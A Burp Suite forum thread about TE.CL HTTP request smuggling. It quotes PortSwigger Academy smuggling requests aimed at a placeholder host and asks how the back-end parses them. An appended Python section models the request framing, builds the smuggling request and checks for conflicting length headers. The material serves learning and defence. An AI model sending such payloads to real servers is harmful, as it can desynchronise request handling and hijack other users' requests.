Burp Suite User Forum

HTTP Request Smuggling

mlhblbl | Last updated: Feb 11, 2022 03:01PM UTC

At the URI https://portswigger.net/web-security/request-smuggling/finding, the request for "Confirming TE.CL vulnerabilities using differential responses" is given as:

    POST /search HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 4
    Transfer-Encoding: chunked

    7c
    GET /404 HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 144

    x=
    0

On the other hand, the request returned by the server was given as:

    GET /404 HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 146

    x=
    0

    POST /search HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 11

    q=smuggling

But if the front-end uses TE, shouldn't the part that needs to be sent to the back-end in the first request be sent up to 0? So I think the request returned by the server should be like this:

    GET /404 HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 146

    x=POST /search HTTP/1.1
    Host: vulnerable-website.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 11

    q=smuggling

Can you explain why it's not going that way?

Uthman, PortSwigger Agent | Last updated: Feb 14, 2022 01:52PM UTC

Thanks for your query. Unfortunately, we are unable to provide personal support or tutoring to Academy users, as we prefer to improve the experience for our entire userbase by focusing on expanding and refining our public content.

Your post will remain up for a member of the community to reply. :)
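The byte accounting behind the two requests quoted in the question at the top of this thread, as an added example that is not part of the thread or of PortSwigger's material: a toy model in which the front-end frames requests by Transfer-Encoding and the back-end by Content-Length. The function names are hypothetical, the chunk size is computed from the constructed bytes rather than copied, and the inner Content-Length of 144 is taken from the question.

```python
# Added illustration: toy TE-front-end / CL-back-end model; names are hypothetical.
CRLF = b"\r\n"
HDRS = (b"Host: vulnerable-website.com\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n")
# The follow-up "normal" request quoted in the question (135 bytes).
NEXT = (b"POST /search HTTP/1.1\r\n" + HDRS +
        b"Content-Length: 11\r\n\r\nq=smuggling")

def build_first_request(inner_cl=144):
    inner = (b"GET /404 HTTP/1.1\r\n" + HDRS +
             b"Content-Length: %d\r\n\r\nx=" % inner_cl)
    # Chunk size is computed from these constructed bytes, not copied from the page.
    body = b"%x\r\n" % len(inner) + inner + CRLF + b"0\r\n\r\n"
    return (b"POST /search HTTP/1.1\r\n" + HDRS +
            b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n" + body)

def frontend_te(stream):
    """Front-end honours Transfer-Encoding: one request ends after the 0-size chunk."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    pos = 0
    while True:
        eol = rest.index(CRLF, pos)
        size = int(rest[pos:eol], 16)
        pos = eol + 2 + size + 2          # size line, chunk data, trailing CRLF
        if size == 0:
            return head + sep + rest[:pos], rest[pos:]

def backend_cl(buffer):
    """Back-end honours Content-Length: returns [(request line, body), ...]."""
    seen = []
    while buffer:
        head, _, rest = buffer.partition(b"\r\n\r\n")
        lines = head.split(CRLF)
        length = 0
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            if name.strip().lower() == b"content-length":
                length = int(value.strip())
        seen.append((lines[0], rest[:length]))
        buffer = rest[length:]
    return seen

def has_both_length_headers(request):
    """Defensive check: CL together with TE is the ambiguity to reject or normalise."""
    names = {ln.partition(b":")[0].strip().lower()
             for ln in request.partition(b"\r\n\r\n")[0].split(CRLF)[1:]}
    return {b"content-length", b"transfer-encoding"} <= names

if __name__ == "__main__":
    forwarded, _ = frontend_te(build_first_request())
    for line, body in backend_cl(forwarded + NEXT):
        print(line, len(body), body[:12])
```

In this model the back-end never decodes chunks, so after it takes the 4-byte body of the first request, the `0` and its CRLFs stay in the stream as ordinary body bytes of the second request, followed by the next request on the connection.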